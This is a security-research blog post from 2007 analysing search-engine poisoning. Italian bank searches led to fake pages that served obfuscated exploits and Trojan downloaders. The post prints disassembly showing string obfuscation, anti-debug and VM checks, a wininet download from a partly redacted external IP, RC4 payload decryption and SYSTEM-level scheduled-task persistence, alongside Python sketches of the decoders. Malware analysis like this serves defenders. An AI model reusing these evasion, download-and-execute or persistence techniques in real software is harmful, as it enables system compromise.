Live.it Poisoned

03.26.2007 - 1:28 PM
Search Engine Poisoning is a topic that we have researched at some length. We discussed it briefly in an October blog post: Search Engine Typosquatting. Our previous research focused on malicious URLs in search engine results for misspelled search terms; it was far less common to discover malicious content for legitimate search terms.

In early March, a report from Sunbelt demonstrated Microsoft Windows Live Search™ Italy returning exploit sites for extremely common search terms. Doing some additional research of our own, we performed searches for the names of financial companies, well-known banks, and lenders. The results were alarming. Many of the URLs in the search results linked to malicious sites capable of silently compromising the visitor.

In one simple example, I searched for the name of an Italian bank without making any typographical errors. Terms like "Banca (name of bank) Roma" and "Banca (name of bank) Milano" produced a series of malicious results that, when visited, could result in a complete compromise of my machine.

The official website of the bank we searched for (a well-known Italian bank) does not appear in any of the results. Many of the results are malicious, but we're going to focus on a single example. A visit to the fifth link loaded the following page:

This looks like it might be an official Lycos page, but it is a fake. The page contains an IFRAME that, without the user's knowledge, loads another website hosting obfuscated exploit code. On an unpatched machine, this exploit code silently downloads and installs a malicious file. Because my OS is patched, however, I am prompted for permission to let the ActiveX installation continue.

Many additional Italian keywords lead to pages that look like this:

Almost all of the pages we came across use nearly identical JavaScript obfuscation, possibly indicating that the same group is behind all of these results. This specific JavaScript obfuscation uses arguments.callee to produce "Code Length Dependent Obfuscation", in which the decoder depends on its own source text, so editing the script breaks the decoding.
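
As a rough illustration of code-length-dependent obfuscation (not the pages' actual script, which is not reproduced in this post), the Python sketch below derives a one-byte key from the length of a decoder's source text. The decoder text, the payload, and the length-modulo-256 key derivation are all assumptions made up for the example; the point is only that adding a debugging statement to the decoder changes the key and garbles the output.

```python
def key_from_source(decoder_source: str) -> int:
    """Derive a one-byte key from the length of the decoder's own source text."""
    return len(decoder_source) % 256


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


# Hypothetical decoder text and payload, invented for this illustration.
DECODER_SOURCE = "function d(s){ /* decoding logic */ }"
PAYLOAD = b"payload script"

# The payload is encoded with a key tied to the untouched decoder.
encoded = xor_bytes(PAYLOAD, key_from_source(DECODER_SOURCE))

# Unmodified decoder: the key matches and the payload comes back intact.
intact = xor_bytes(encoded, key_from_source(DECODER_SOURCE))

# An analyst inserts a debugging statement: the length changes, and so does the key.
TAMPERED_SOURCE = DECODER_SOURCE.replace("{", "{ alert(s);", 1)
garbled = xor_bytes(encoded, key_from_source(TAMPERED_SOURCE))
```

In practice this is why such scripts are usually analyzed by hooking the final evaluation step rather than by editing the decoder itself.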

The problem is most apparent with Live Search, but similar results are returned by both Google and Yahoo! (often further down the page).

The malicious code, delivered in the form of various .cab files, is a Trojan Downloader that attempts to connect to a specific IP address to download another FSG2-packed file. The IP addresses involved are based in either Ukraine or Moldova and have been known in the past to host malcode.

Here comes the Malcode

Each cab file contains an executable as well as an ini file that specifies how to run the executable.

Contents of ini:

---------------------------------
[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\plh.exe
[Version]
Signature="$CHICAGO$"
AdvancedInf=2.0
---------------------------------
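
When triaging many such cabinets, it can help to pull the hooked command out of the ini file automatically. The sketch below is one way to do that with Python's standard configparser; the function name `hook_commands` is an assumption for illustration, and interpolation is disabled because the `%EXTRACT_DIR%` placeholder would otherwise be rejected by the parser.

```python
import configparser

# The ini contents shown above, reproduced as a raw string.
INF_TEXT = r"""[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\plh.exe
[Version]
Signature="$CHICAGO$"
AdvancedInf=2.0
"""


def hook_commands(inf_text: str) -> list:
    """Return the 'run' command of every section listed under [Setup Hooks]."""
    # interpolation=None keeps '%EXTRACT_DIR%' as literal text.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(inf_text)
    commands = []
    for _name, section in parser.items("Setup Hooks"):
        # Each value under [Setup Hooks] names another section to look up.
        if parser.has_option(section, "run"):
            commands.append(parser.get(section, "run"))
    return commands


if __name__ == "__main__":
    for command in hook_commands(INF_TEXT):
        print(command)
```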

The executable and ini files have randomly generated names and lengths. The executables are all packed with FSG2 and are identical except for two bytes after the "MZ" letters in the executable header. The files are very small: 3489 bytes. Nowadays, a very small file size is usually a sign of downloader malware, and that's indeed what these files are.

The file is written in Visual C++ and is compiled to take very little space.

The very first subroutine (shown below) is a little confusing, even if the code seems crystal clear:

The code looks like single-step detection: it calls GetTickCount twice and compares the difference between the two tick counts against a reference number found in the code, to find out if the application is being single-stepped. However, no action is taken when the difference is above that number. We also see code using the SIDT instruction to grab the IDT base, followed by the usual comparison to detect a VM, but again no action is taken, and the subroutine doesn't return any value either.
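
The timing half of that check can be sketched in Python as follows. This is only an illustration of the general technique, not a translation of the sample's code: the function name, the threshold parameter, and the use of `time.monotonic` in place of GetTickCount are assumptions, and the SIDT half has no Python equivalent. The clock is injectable so the logic can be exercised without a debugger.

```python
import time
from typing import Callable


def elapsed_exceeds(work: Callable[[], None],
                    threshold_ms: float,
                    clock: Callable[[], float] = time.monotonic) -> bool:
    """Return True if running `work` took longer than `threshold_ms`.

    Code that normally takes microseconds takes far longer when a human
    is single-stepping through it, which is what the check relies on.
    """
    start = clock()                      # first timestamp
    work()                               # the code being timed
    elapsed_ms = (clock() - start) * 1000.0   # second timestamp, in ms
    return elapsed_ms > threshold_ms


if __name__ == "__main__":
    # A trivial workload should finish well under a generous threshold.
    print(elapsed_exceeds(lambda: sum(range(1000)), threshold_ms=500.0))
```

A check like this only has an effect if the caller acts on the returned value, which is exactly what the first sample fails to do.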

The code isn't dual-core or Hyper-Threading compliant either: each logical processor has its own IDT, so the SIDT result depends on which one runs the check. It's still unclear if this is "dead" code left by the author, or just a naive attempt to fool some emulation engine. As you will see later on, the second sample uses the same code but takes action depending on the results. The first sample most likely contains a bug: the authors forgot to add code to exit the process if the application is traced or running in a VM.

Another notable thing in the binary is that it uses different string encoding for every string it wishes to protect, to avoid quick string decoding, such as that performed by a generic IDC script. Strings are decoded onto the stack and never overwrite the encoded strings.

seg001:0040109F FF 35 24 20 40 00 push    ptr_to_str
seg001:004010A5 5E                pop     esi
seg001:004010A6 8B 7D FC          mov     edi, [ebp+var_4]
seg001:004010A9 6A 08             push    8
seg001:004010AB 59                pop     ecx
seg001:004010AC               decode_string
seg001:004010AC AC                lodsb
seg001:004010AD 04 8E             add     al, 8Eh
seg001:004010AF 2C 64             sub     al, 64h
seg001:004010B1 AA                stosb
seg001:004010B2 49                dec     ecx
seg001:004010B3 75 F7             jnz     short decode_string

Another example:

seg001:00401207 BE 58 20 40 00    mov     esi, offset aWsastartup
seg001:0040120C FF 75 FC          push    [ebp+var_4]
seg001:0040120F 5F                pop     edi
seg001:00401210 6A 0B             push    0Bh
seg001:00401212 59                pop     ecx
seg001:00401213               decode_string_0
seg001:00401213 AC                lodsb
seg001:00401214 34 D7             xor     al, 0D7h
seg001:00401216 2C 2D             sub     al, 2Dh
seg001:00401218 AA                stosb
seg001:00401219 49                dec     ecx
seg001:0040121A 75 F7             jnz     short decode_string_0

The byte operations are ADD, SUB, or XOR. The string encoding is used primarily to hide API function names to be used with GetProcAddress and module names for LoadLibrary. It's also used to hide names of mutexes, domains to resolve, and the like.
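
The two decoding loops shown above can be mirrored in a few lines of Python, which is handy when recovering strings outside a debugger. The constants (8Eh/64h and 0D7h/2Dh) come from the listings; the function names and the encoder used to build test input are assumptions for illustration, since the encoded bytes themselves are not reproduced in this post.

```python
def decode_add_sub(data: bytes, add: int, sub: int) -> bytes:
    """Mirror 'add al, X / sub al, Y' on every byte (8-bit wraparound)."""
    return bytes((b + add - sub) & 0xFF for b in data)


def decode_xor_sub(data: bytes, xor_key: int, sub: int) -> bytes:
    """Mirror 'xor al, X / sub al, Y' on every byte (8-bit wraparound)."""
    return bytes(((b ^ xor_key) - sub) & 0xFF for b in data)


def encode_xor_sub(plain: bytes, xor_key: int, sub: int) -> bytes:
    """Inverse of decode_xor_sub, used here only to build sample input."""
    return bytes(((b + sub) & 0xFF) ^ xor_key for b in plain)


if __name__ == "__main__":
    # Hypothetical round trip: 0Bh (11) bytes, as in the second loop.
    blob = encode_xor_sub(b"WSAStartup\x00", 0xD7, 0x2D)
    print(decode_xor_sub(blob, 0xD7, 0x2D))
```

Because each string uses its own constants, a generic script has to extract the immediates from every loop before it can decode anything, which is presumably the point of the scheme.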

Eventually, it tries to download a file using wininet API functions:

004018BF  |. 53             PUSH EBX
004018C0  |. 53             PUSH EBX
004018C1  |. 53             PUSH EBX
004018C2  |. 53             PUSH EBX
004018C3  |. FF75 F0        PUSH DWORD PTR SS:[EBP-10]
                ; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
004018C6  |. FF55 E8        CALL DWORD PTR SS:[EBP-18]
                ;  wininet.InternetOpenA

[...]


004018D4  |. 53             PUSH EBX
004018D5  |. 68 00010884    PUSH 84080100
004018DA  |. 53             PUSH EBX
004018DB  |. FF35 F4214000  PUSH DWORD PTR DS:[4021F4]
                        ;  hwnbsqnn.00402270
004018E1  |. FF75 F8        PUSH DWORD PTR SS:[EBP-8]
                        ;  "http://195.[removed]/view/logo.jpg?f[removed]"
004018E4  |. 50             PUSH EAX
004018E5  |. FF55 FC        CALL DWORD PTR SS:[EBP-4]
                        ;  wininet.InternetOpenUrlA

The downloaded file is encrypted and stored on the heap. Reverse engineering the decryption routine suggests that the file is encrypted with the RC4 algorithm. (In the code, we can see the initialization of the 256-byte S-box, the permutation with the encryption key, and then the final encryption/decryption.)

seg001:00401B0D
seg001:00401B0D               loc_401B0D:
seg001:00401B0D FF 37             push    dword ptr [edi]
seg001:00401B0F B9 08 22 40 00    mov     ecx, offset RC4_key ; "mgwyjkd5l"
seg001:00401B14 56                push    esi
seg001:00401B15 56                push    esi
seg001:00401B16 6A 09             push    9
seg001:00401B18 5A                pop     edx
seg001:00401B19 E8 12 00 00 00    call    RC4_routine

Here is a snippet of the routine:

seg001:00401B33 81 EC 0C 01 00 00 sub     esp, 10Ch
seg001:00401B39 89 4D F4          mov     [ebp-0Ch], ecx
seg001:00401B3C 89 55 F8          mov     [ebp-8], edx
seg001:00401B3F 33 C9             xor     ecx, ecx
seg001:00401B41 31 C0             xor     eax, eax
seg001:00401B43               RC4_Init
seg001:00401B43 88 84 28 F4 FE FF+mov     [eax+ebp-10Ch], al
seg001:00401B4A 40                inc     eax
seg001:00401B4B 3D 00 01 00 00    cmp     eax, 256        ; S-Table : S0-S255
seg001:00401B50 72 F1             jb      short RC4_Init
seg001:00401B52 53                push    ebx
seg001:00401B53 56                push    esi
seg001:00401B54 57                push    edi
seg001:00401B55 88 4D FE          mov     [ebp-2], cl     ; Swap
seg001:00401B58 88 4D FF          mov     [ebp-1], cl
seg001:00401B5B 33 FF             xor     edi, edi
seg001:00401B5D               loc_401B5D:
seg001:00401B5D 57                push    edi
seg001:00401B5E 58                pop     eax
seg001:00401B5F 33 D2             xor     edx, edx
seg001:00401B61 F7 75 F8          div     dword ptr [ebp-8] ; Modulo
seg001:00401B64 8B 45 F4          mov     eax, [ebp-0Ch]
seg001:00401B67 8D B4 2F F4 FE FF+lea     esi, [edi+ebp-10Ch]
seg001:00401B6E 8A 04 10          mov     al, [eax+edx]
seg001:00401B71 8A 16             mov     dl, [esi]
seg001:00401B73 02 06             add     al, [esi]
seg001:00401B75 00 45 FF          add     [ebp-1], al

Once the data is decrypted, the downloader checks whether it decoded to a PE file by comparing the first two bytes with "MZ". The file is then dropped onto the hard disk in the temp directory under a random name and executed.

Example: C:\Documents and Settings\user\Local Settings\Temp\ozbjrc.exe
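
For analysts who capture the encrypted download, the decrypt-then-check step can be reproduced offline. The sketch below assumes the routine is standard, unmodified RC4 (the disassembly suggests this but only a snippet is shown) and uses the 9-byte key visible in the listing; the function names are hypothetical.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4; the same call both encrypts and decrypts."""
    # Key scheduling: identity S-box (S0-S255), then permute it with the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]

    # Keystream generation, XORed with the data byte by byte.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_pe(buf: bytes) -> bool:
    """Same sanity check the downloader performs: first two bytes are 'MZ'."""
    return buf[:2] == b"MZ"


if __name__ == "__main__":
    key = b"mgwyjkd5l"  # key string seen in the first sample's listing
    # Stand-in for a captured download: an 'MZ' stub encrypted with the key.
    captured = rc4(key, b"MZ\x90\x00stub")
    print(looks_like_pe(rc4(key, captured)))
```

If the decrypted buffer fails the "MZ" check, either the key differs between samples or the routine deviates from standard RC4, and the disassembly should be rechecked.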

Analysis of the second file:

The second file is also packed by FSG2 and written in Visual C++. It uses the same string decoding techniques, and it also has the RC4 code embedded, which means that it probably decrypts another file. It's also rather small.

It also uses the single-step detection, as well as the IDT base check. But this time, if something is detected, the application just quits. They fixed their bugs. ;-)

First Sample:

seg001:0040108F E8 1C 02 00 00    call    CheckTraceAndCheckVM ; No Action Taken
seg001:00401094 6A 08             push    8
seg001:00401096 58                pop     eax

Second Sample:

seg001:0040137F                   call    CheckTraceAndCheckVM
seg001:00401384                   and     al, al
seg001:00401386                   jz      short good_reverser
seg001:00401388                   push    0               ; Bad Reverser
seg001:0040138A                   call    ds:exit

One interesting thing to note is the use of the Service API functions to check whether the Schedule service is started. If it is not, the malware starts it.

Using COM, it accesses the scheduler and creates a new task with a random name. The task is meant to run the second file (the one that was decrypted in the first place) at system startup as NT AUTHORITY\SYSTEM, which means full access to the machine (on the default installation of the infected machine). The file is set to read-only and locked by the malware to prevent easy deletion.

Other than that, it decrypts API function names and dll names, and uses wininet to try to download yet another file.

At the time of this write-up, no files are available to download, but the names are generated randomly, and the authors could place files to be downloaded any day.

The first downloader managed to grab its files from a website in Moldova, and the second downloader tries to get its files from inhoster, which is located in Ukraine. These countries are geographically close.

It's also important to note that the files call the Sleep() API function regularly to wait a few minutes before trying to download a file again. The malware most likely created the new task so that it can restart and probe URLs for hours, days, or months until the authors place an encrypted update that will be downloaded, decrypted, and executed.

At this point, the payload could be anything from a bot to a rootkit, and on a default installation it would run with administrator privileges, resulting in full system compromise.

Researchers: Patrick Comiotto, Nicolas Brulez